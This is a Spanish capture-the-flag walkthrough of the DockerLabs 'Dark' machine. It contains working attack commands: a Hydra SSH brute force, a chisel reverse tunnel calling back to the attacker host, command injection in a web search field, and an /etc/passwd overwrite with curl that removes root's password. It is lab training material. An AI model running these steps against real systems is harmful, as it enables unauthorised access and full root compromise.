Dark - DockerLabs
| OS | Dificultad | Creator |
|---|---|---|
| Linux | Medio | Mishineti |
Escaneo y Reconocimiento de puertos
Con ARP scan miramos que IP’s tenemos disponibles.
Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.
nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2
-p-: Escanea todos los puertos (1-65535).--open: Solo muestra los puertos abiertos.-sS: Realiza un escaneo SYN, que es rápido y discreto.-sC: Utiliza los scripts de reconocimiento por defecto de Nmap.-sV: Detecta la versión del servicio en los puertos abiertos.--min-rate=5000: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.-n: No realiza resolución DNS.-Pn: No realiza ping previo para determinar si el host está activo.-vvv: Muestra resultados detallados y en tiempo real.
Vemos que esta abierto el puerto 22 SSH y el puerto 80 HTTP
Enumeración Web
Si accedemos a la pagina web vemos lo siguiente
Usamos Gobuster para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
gobuster dir- Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.-u http://172.20.10.5/Especifica la URL objetivo que deseas escanear en busca de directorios.-wEspecifica que diccionario queremos usar-xPara indicar que tipo de extension queremos que nos encuentre
Gobuster ha encontrado diferentes direcotrios
Si accedemos al repositorio info vemos lo siguiente:
Tenemos un posible usuario para poder acceder vía SSH vamos hacer fuerza bruta.
Ataque de fuerza bruta con Hydra
Como tenemos un posible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo SSH de la siguiente forma:
hydra -l toni -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2
-l- Para especificar el usaurio-P- Para especificar que diccionario de fuerza bruta usaremosssh://10.10.10.2- Especificamos que queremos atentar contra el protocolo SSH de la IP victima
Como vemos, existe el usuario toni y la contraseña es banana.
Intrusión
Ahora accedemos vía SSH
ssh toni@172.17.0.2
Vemos que tiene otra interfaz de red
No veo la forma de como escalar privilegios en esta maquina ni con linpeas así que vamos a pasarnos chisel a esta maquina con curl y vamos a generar el tunel para redirigir el trafico de la 20.20.20.3 a nuestra maquina.
Nos pasamos el chisel a la maquina 10.10.10.2.
Ahora desde la máquina atacante nos ponemos en escucha con chisel.
chisel server --reverse -p 1234
Y en la maquina victima con IP 10.10.10.2 configuramos el chisel para que podamos ver desde la maquina 10.10.10.1 la IP 20.20.20.2.
./chisel client 10.10.10.1:1234 R:socks
Genial ya nos funciona como nos decía que tenia una web donde había subido la base de datos de la DGT etc…,vamos a configurar foxyproxy para acceder a la web de esa IP.
Ahora si accedemos a la IP 20.20.20.3 vemos lo siguiente:
Vamos a pasar-le gobuster haber si encuentra algún directorio interesante.
no encontramos nada interesante, entonces vamos a probar de ingresar algo en el campo de busqueda.
Vemos que nos muestra información del sistema
Ahora vamos a listar el /etc/passwd
No vemos un posible usuario para hacer fuerza bruta entoces lo que voy hacer sera mandarme una reverse shell
Lo que podemos hacer es mandarnos una reverse shell a la maquina 20.20.20.2
Al estar investigando un rato vemos que no hay nada interesante para poder escalar privilegios lo que podemos hacer es usar curl para poder modificar el archivo /etc/passwd y así acceder al root.
Veamos como se hace esto
Copiamos el passwd a la carpeta /tmp
Ahora eliminamos la primera x que tiene root y guardamos
Ahora hacemos el siguiente comadno
curl file:///tmp/passwd -o /etc/passwd
Si hacemos un cat a /etc/passwd ahora vemos que en root ya no tiene la x.
Esto sucede debido a cómo se manejan los permisos y la propiedad del archivo en Linux
Ahora solo queda hacer su root y escalaremos a root sin necesidad de introducir contraseña
Ya somos ROOT